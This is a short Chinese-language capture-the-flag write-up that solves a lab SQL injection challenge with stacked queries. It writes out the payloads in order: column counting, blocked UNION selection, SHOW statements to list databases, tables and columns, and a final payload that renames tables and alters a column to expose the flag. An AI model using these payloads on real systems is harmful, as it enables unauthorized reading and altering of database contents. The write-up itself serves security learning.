一.看题目应该是和sql注入有关

　　1.进入实验环境，发现是一个输入框，尝试判断一下是否存在sql注入， 输入  '

　　

 

 

 　　根据报错信息可以知道存在sql注入，然后常规的操作，判断查询的字段数目  '  order by 2 #  ,页面显示正常

 

　　当 '  order by 3# 时，发现报错，由此判断查询的字段数为2.

　　

 

 

　　通过union 联合查询看能不能捞到点有用的信息， ' union select version(),1 #  ,根据结果的显示，后端应该把关键词都给过滤掉了

 

　　那我们试一试能不能堆叠注入   1' ;show databases; #    来查询全部的数据库

　　

 

　　发现执行成功，再来查询所有的表名  ，   1';show tables;#

　　

 

 

 　　根据返回的结果我们发现1919810931114514表很可疑。

　　为了证明我们的猜想，尝试去看看这个表的存在哪些字段

　　通过  1'; show columns from   `1919810931114514` ;#    这里的表名为数字 ，我们要用反引号 即上面数字键盘1的左边一个

　

 

 

 　　看到flag我们就肯定flag就在这个表里面，现在就是要查询出来。

 　　这里只有两个表，我们输入1查询出来的结果应该来自words表里，我们又可以通过1' or 1=1#，

　　查出这个表中的所有信息，所以这里的思路就是通过把  1919810931114514  表名改为 words

　　然后就可以查询这个表的全部信息。

　　';rename tables words to words1;rename tables `1919810931114514` to words; alter table words  change flag id varchar(100);#

　　在通过1' or 1=1#，得出flag。